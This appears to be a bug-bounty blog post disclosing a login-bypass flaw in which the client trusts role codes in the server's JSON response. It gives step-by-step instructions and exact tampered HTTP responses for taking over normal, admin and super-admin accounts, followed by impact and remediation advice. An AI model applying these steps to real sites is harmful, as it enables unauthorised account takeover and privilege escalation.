Sunday, August 31, 2014

Privilege Escalation Using Authentication Bypass

A Way to Gain Super Admin & Admin Privileges By Bypassing Authentication

While researching and working on bug bounties in late January 2013, I found a way to bypass authentication that allowed takeover of any user account on the affected site, including gaining Admin and Super Admin privileges, wherever the site was vulnerable to this class of attack.

The root cause is that the login validation and access control decisions are predictable from the login response: the client grants access and assigns privileges based on values in a JSON message returned by the server. Because of this, an attacker can defeat the application's anti-tampering countermeasure, log in to any victim's account without knowing its password, and choose the privilege level that will be granted, since the login validation process is entirely predictable to the attacker.

I first tried the usual login bypass techniques, such as sending the login request with arbitrary or anonymous HTTP methods, but they all failed. The application also had a countermeasure against tampering: if the login request was modified in transit, the server silently dropped it instead of answering. The challenge was therefore to get around that countermeasure, understand the login validation process, and find a weakness in it. Below is how I was able to bypass both the countermeasure and the authentication.


Please note: there is a precondition. The attacker must know the victim's login ID (user ID) and must be able to lock the victim's account.


During testing we found that an attacker can bypass authentication for Super Admin, Admin and Normal (read-only privileged) users by locking the victim's account and then modifying the JSON login response before it reaches the browser. The server-side countermeasure only inspects the request; the message tampered with here is the response, which the server never sees again.


Steps to Execute the Attack:

1. Go to the application login page and lock the victim's account with 3 wrong password attempts.

2. Now enter the victim's username (here the normal test user) with any random value as the password.

3. Intercept the login request and forward it unchanged, then intercept the server's response. The original response looks like this:


Original Response:

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 88
Date: Wed, 16 Jan 2013 10:05:20 GMT

OK[10,0,0,0,0,["site.com","You Account has been Locked, Please contact Administrator."]]


4. Modify the body of the original response as shown below. Do not change the 200 OK status line or the headers (apart from Content-Length, which must match the new body; intercepting proxies normally recalculate it automatically), then forward the response. The attacker is now logged into the normal user's (victim's) account.


Modified Response to Bypass Authentication of Normal User:

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 45
Date: Wed, 16 Jan 2013 10:09:10 GMT

OK[10,0,0,0,0,["site.com","N","Normal User"]]

Note: "10" denotes a normal user and "N" denotes read-only privilege.


5. To gain Admin privileges while bypassing authentication, repeat steps 1, 2 and 3 and then modify the original response as shown below. Again, do not change the 200 OK status line or the headers (other than Content-Length), then forward the response. The attacker is now logged into the admin user's (victim's) account.

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 44
Date: Wed, 16 Jan 2013 10:13:07 GMT

OK[20,0,0,0,0,["site.com","Y","Admin User"]]

Note: "20" denotes an admin user and "Y" denotes write privilege.


6. To gain Super Admin privileges while bypassing authentication, repeat steps 1, 2 and 3 and then modify the original response as shown below. Do not change the 200 OK status line or the headers (other than Content-Length), then forward the response. The attacker is now logged into the super admin user's (victim's) account.

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 50
Date: Wed, 16 Jan 2013 10:17:35 GMT

OK[30,0,0,0,0,["site.com","Y","Super Admin User"]]

In this way authentication can easily be bypassed and Super Admin and Admin privileges gained :).


Impact: 

The login validation and access control processes are predictable from the login response, so an attacker can compromise any user account of the application without the password and can also gain Super Admin and Admin privileges. The countermeasure that drops modified (tampered) requests was bypassable because it never covers the response.



Recommendation:

Login validation must not depend on any combination of response code values, cookie values or JSON status code values that the client interprets. It must not rely on client-side validation or on a countermeasure that merely drops modified requests. Instead, the server must verify the password itself, issue an opaque session identifier on success, and enforce access control on every subsequent request from server-side session state, so that the role or privilege level is never accepted from the client.

In this way one can perform privilege escalation using authentication bypass and take over any victim's account by bypassing the modified-request-dropping countermeasure and exploiting the predictable login validation and access control processes. The same approach can be used to find this type of vulnerability on many other websites.


Suggestions and Feedbacks are welcome.